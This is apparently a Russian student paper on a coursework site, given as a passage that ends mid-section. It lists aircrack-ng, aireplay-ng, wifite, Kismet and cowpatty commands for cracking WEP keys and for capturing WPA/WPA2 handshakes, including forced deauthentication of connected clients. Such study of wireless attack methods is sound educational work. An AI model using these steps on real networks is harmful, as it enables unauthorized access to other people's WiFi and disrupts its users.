сетевые интерфейсы
Iwconfig
Переводим сетевую карту WiFi в режим мониторинга
airmon-ng start wlan0
Сканируем видимые для нас точки доступа
airodump-ng mon0
Перехватываем handshake
airodump-ng -c 11 -w crackme --bssid 22:22:22:22:22:22 mon0
Отключаем пользователей точки доступа
aireplay-ng -b 22:22:22:22:22:22 -h 33:33:33:33:33:33 mon0
Узнаем пароль
aircrack-ng -z -b 22:22:22:22:22:22 crackme*.cap
2.2 Выводы по первому разделуБлагодаря тому что, в WEP шифровании каждый пакет содержит в себе часть ключа, мы с легко и довольно быстро узнали пароль. Так как данная технология уже устарела и в 2004 году IEEE (Институт инженеров электротехники и электроники) объявили WEP устаревшим из-за того, что стандарт «не выполнил поставленные перед собой цели обеспечения безопасности беспроводных сетей».
3. Проникновение в WiFi через ключ WPA/WPA2
По той причине что WPA2 более трудная система шифрования, то нам придется потратить на нее очень много времени, т.к. в отличии WEP шифрования данный ключ практически не имеент уязвимостей. В данной главе я опишу какими распространенными способами возможна атака WiFi и сколько потребуется времени на ее осуществление.
3.1 Способ через команду Airodump-ng
Перехватываем Handshake
Airodump-ng wlan0mon --bssid AC:F1:DF:87:93:2D --channel 11 --write handshake В связи с тем что захват handshake происходит при подключении клиента к точке достопа, то необходимо подождать пока клиент подключится к точке доступа, или помочь клиенту переподключится к точке доступа при помощи деаунтефикации
aireplay-ng -0 10 –a AC:F1:DF:87:93:2D –c 10:68:3F:70:6D:13 wlan0mon
Когда поймается handshake это отобразитс в правом верхнем углу
3.2 Wifite
В терминале вводим wifite и выбираем нужную нам точку доступа.
Утилита начинает ловить handshake Далее как только handshake будет пойман, программа остановит перехват и сохранит handshake в файле/root/hs/k-226_58-98-35-E9-2B-8D.cap.
3.3 Kismet
Для того чтобы запустить Kismet вводим в терминале
Sudo kismet
Откроется программа и будет производить поиск сетей и ловлю handshakeов
Для более точного перехвата ограничиваем поиск по каналу
Выбрав нужную точку доступа и жмем enter, сразу же появится окно в котором будет показана вся информация о точке доступа Должен пойти сбор пакетов. Нас интересуют пакеты Data Packets и Crypt Packets.Их количество должно увеличиваться.Если они равны 0, то либо в сети нет клиентов, либо сетевая карта не перешла в неразборчивый режим.
Проверяем наличие handshakeов через aircrack-ng
aircrack-ng Kismet-20160710-19-04-09-1.pcapdump Видим, что handshakeов нет, ждем некоторое время пока не перехватит handshake
Как только сы обнаружим что handshake пойман, можно закрыть kismet и работать с handshakeом
Сохранение будет в виде Kismet-20160710-19-04-09-1.pcapdump
3..4 Cowpatty
Выполняем захват командой
airodump-ng --bssid AC:F1:DF:87:93:2D -c 11 -w cowpatty wlan0mon
3.5 Выводы по второму разделу
В это разделе было показано как захватывать handshake, то есть это нам надо для того что бы расшифровать пароль. Сам Handshake состоит из пакетов при подключения клиента к WiFi. Все пакеты зашифрованы, но работа (расшифровка) с перехваченными данными рукопожатия будет рассмотрена в следующей главе
4. Фильтрация handshake
Фильтрация handshake необходима для того что бы отбросить все лишние пакеты, оставив нужные нам, тем самы облегчить скорость
4.1 Cowpatty
cowpatty -r handshake-01.cap -c
-r указывает файл для проверки
-с указывает что нам надо проверить handshake а не взламывать его
4.2 WiresharkПохожие работы
Тема: Анализ методов защиты содержимого сайта от несанкционированного использования |
Предмет/Тип: Отсутствует (Курсовая работа (т)) |
Тема: Обзор методов оздоровления |
Предмет/Тип: Медицина, физкультура, здравоохранение (Реферат) |
Тема: Обзор методов диагностики агрессивности |
Предмет/Тип: Психология (Реферат) |
Тема: Обзор возможных методов защиты |
Предмет/Тип: Информатика, ВТ, телекоммуникации (Реферат) |
Тема: Обзор возможных методов защиты |
Предмет/Тип: Информатика, ВТ, телекоммуникации (Реферат) |
Интересная статья: Быстрое написание курсовой работы